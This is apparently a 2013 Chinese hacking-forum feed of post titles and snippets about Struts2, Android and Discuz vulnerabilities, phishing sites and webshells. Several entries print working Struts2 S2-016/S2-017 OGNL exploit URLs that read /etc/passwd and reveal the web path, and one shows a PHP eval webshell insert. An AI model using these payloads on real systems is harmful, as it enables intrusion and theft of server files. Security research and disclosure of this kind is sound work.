一种巨猥琐的挂马方式、超淫荡APT的挂马思路:如果这么挂马会不会挂进内网 如果这么挂马会不会挂进内网(求测试) xsser (十根阳具有长短!!) | 2013-07-24 11:53 1
女士回电信诈骗电话 几秒钟时间100元话费没了
“你好,我孩子今年5岁,被蚊子咬后高烧不退,急需一种退烧药。如果有药物或者类似经历,请与我们联系,电话153xxxxx……”7月20日下午,
视频: youtube超火中毒舞曲-再見了,原版 + 混音版 + 官方原曲 + 下载
【Acfun:P2】用生命在唱歌の原版 【Acfun:P1】2013年最中毒舞曲-再見了 【Acfun:P3】D4NNY ft SICKICKMUSIC - Goodbye (Official Remix) 【优酷】视频
发现一个phpmyadmin,给过滤'导不出shell 求方法
发现一个phpmyadmin,给过滤'导不出shell 求方法 三十度 | 2013-07-23 20:41 今天碰到个phpmyadmin 发现只要执行 Insert INTO a (cmd) VALUES('<?php @eval($_POST[cmd])?>'); 或 select cmd from a into outfile
辟谣:最近看见有人说taobao的库被拖?求真相,打击造谣!!!
辟谣:最近看见有人说taobao的库被拖?求真相,打击造谣!!! 淘宝数据库被拖是真的吗? 淘宝数据库被拖走是真的吗? 最近看见有人说taobao
(视频)USRP 来 Sniffing 无线键盘,27Mhz keyboard sniffing
视频: 27Mhz keyboard sniffing Sniff Logitech wireless keyboard with USRP. 用USRP 来 Sniffing 无线键盘...请赏几个乌云币鼓励下吧.... [原文地址] 相关内容: 使用电视棒接收飞机信号 简单的实现方法
腾讯泄露隐私?看卫士哥获得女神的好友的名单,社工可能认识的人!
首先 我们创建一个新的Q号,然后加你要获取QQ的为好友.怎么加上女神方法卫士个就不多说了. 然后打开QQ的查找联系人功能 这时候就会出现一种这样的
发两个qq钓鱼站点 求测试 - 乌云白帽子 XSS 实例
发两个qq钓鱼站点 求测试 白熊一枚 | 2013-07-21 23:18 第一个: 先给地址为敬: kkk.sinotide.com.cn/www/1071vfghy-kmlo 第一个站点目测是个独服,ip为173.252.247.162,绑了大量的域名。
刚刚看到个鱼站,然后就被轮流爆菊了……
刚刚看到个鱼站 by灰客 | 2013-07-21 11:08 http://ldsjc.com/ http://ldsjc.com/manager/ 我去 这个源码碉堡了 谁去扒下来? @核攻击 @xsser @VIP [原帖地址] 相关讨论: 1# 苦战 | 2013-07-21 11:11 紫緣設計 Ver 最新官方完美版【完全防
Discuz! 多个版本 后台拿shell,需有安装APP权限
具体哪些版本存在漏洞,自己测试,只要能安装这个插件的,就能拿到shell,这个已经在手里 很久了,但是使用其拿shell,也没几次,没事写出来
浅谈Android手机木马手工查杀
作者:南拳Daddy 版权所有,转载请注明作者以及来源FreebuF.COM,违者必究。 本人关注移动网络安全将近3年了,写这篇文章
浅谈大型网络入侵检测建设
一、前言 伊朗2010年被报出核工厂遭受“超级工厂”(Stuxnet)病毒攻击,蠕虫通过多个漏洞潜伏在工控系统近两年未被发现。相信诸如上述案例
如何设置安全的密码
1、写此文的原因 最近出现的“棱镜”事件,加上之前密码泄漏事件,这大大的增加了我们在互联网上的安全问题,尤其对我们来说重要的一些账户和密码,如
Struts2再爆远程代码执行漏洞(S2-016)
Struts又爆远程代码执行漏洞了!在这次的漏洞中,攻击者可以通过操纵参数远程执行恶意代码。Struts 2.3.15.1之前的版
中国黑客组织发现第二个Android万能密钥漏洞
一个中国的安全组织Android Security Squad称他们发现了第二个万能密钥,能够在不破坏应用签名的情况下修改应用本身。 一个文件或者文档的数字签名
Facebook的漏洞可以让攻击者在分分钟内重置用户账户密码
安全研究人员Dan Melamed近日发现了一个Facebook平台的严重漏洞,可以允许攻击者完全控制任何账号。 这个漏洞之所以被认为严重是因为
小型APT之看我如何入侵电视,我是如何入侵智能电视的
这么多年来,我只看国少许的对于电视机的入侵,现在在这个日益智能化的是时代里,什么都智能,什么都联网,这就对看似安全的智能化生活埋下了隐患,这
一朵奇葩
昨晚很多安全公司和互联网公司安全部门的工程师们都没睡好觉,通宵达旦的在加班。 Struts这个漏洞这次来势之所以这么凶猛(见昨天的文章,点击右
OGNL设计及使用不当造成的远程代码执行漏洞
我们可以把OGNL作为一个底层产品,它在功能实现中的设计缺陷,是如何能够被利用并远程执行恶意代码的,而不是完全在struts2这个产品的功能
在线支付逻辑漏洞总结
0x00 背景介绍 随着网民越来越习惯于网上购物,出现了越来越多的电商网站,在线交易平台等。 其中肯定要涉及在线支付的流程,而这里面也有很多逻辑。 由于这
腾讯微信奇葩漏洞,劫持朋友圈好友打开指定网站,或许还可以XSS、钓鱼哟
中午的时候,有一朋友发消息过来,说是在朋友圈点击我名字,会跳出一个名为“诺基亚生活”的奇怪网页,而点击其他人正常,只有我这样…… 本人表示相当
密码找回功能可能存在的问题
0x00 背景介绍 有人的地方就有江湖。 互联网中,有用户注册的地方,基本就会有密码找回的功能。 而密码找回功能里可能存在的漏洞,很多程序员都没有想到。 而
IIS WebDAV安全配置
0x00 简介 WebDAV是一种基于 HTTP 1.1协议的通信协议.它扩展了HTTP 1.1,在GET、POST、HEAD等几个HTTP标准方法以外添加了一些
浅谈互联网中弱口令的危害
0x00 什么是弱口令 弱口令(weak password) 没有严格和准确的定义,通常认为容易被别人(他们有可能对你很了解)猜测到或被破解工具破解的口令均为弱口令。 弱口
Android uncovers master-key 漏洞分析
0x00 背景 Bluebox的CTO Jeff Forristal在其官方blog爆出一个漏洞叫做UNCOVERING ANDROID MASTER KEY,大致是不篡改签名修改andr
Bluebox Security提报Android 绕过应用签名认证漏洞原理
标 题: 【原创】Bluebox Security提报Android 绕过应用签名认证漏洞原理 作 者: jiazhijun 时 间: 2013-07-09,15:30:06 链 接: http://bbs.pediy.com/showthread.php?t=175129 本文章由Jack_Jia编写,
Struts2 S2-016/S2-017 命令执行带回显、看web路径、getshell exp整理
大家都发了,,我就整理了一下。友情提示,自己小命比shell重要哦。。 喜欢就点一下感谢吧^_^ 带回显命令执行: http://www.example.com/struts2-blank/example/X.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} 爆路径: http://www.example.com/struts2-blank/example/X.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D 写文件:
Struts2 S2-016/S2-017 查看物理路径 EXP
http://www.xxx.com/xxxx.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D 已测试一个win站一个linux站均成功 修改自椰树安全网那个EXP。 [原帖地址]
struts2 最新S2-016-S2-017漏洞通杀struts2所有版本
struts2 最新S2-016-S2-017漏洞通杀struts2所有版本 园长 (你在身边就是缘,缘分写在数据库里面。) | 2013-07-17 12:29 Struts2这个不争气的家
h3c snmp获取管理员登录密码
参考资料 WooYun: 中国移动H3C防火墙侧漏,利用snmp获取管理员密码,成功登录设备! 测试型号:h3c SecPath F5000-A5 漏洞详情 管理员用户名和密码可以通过snmp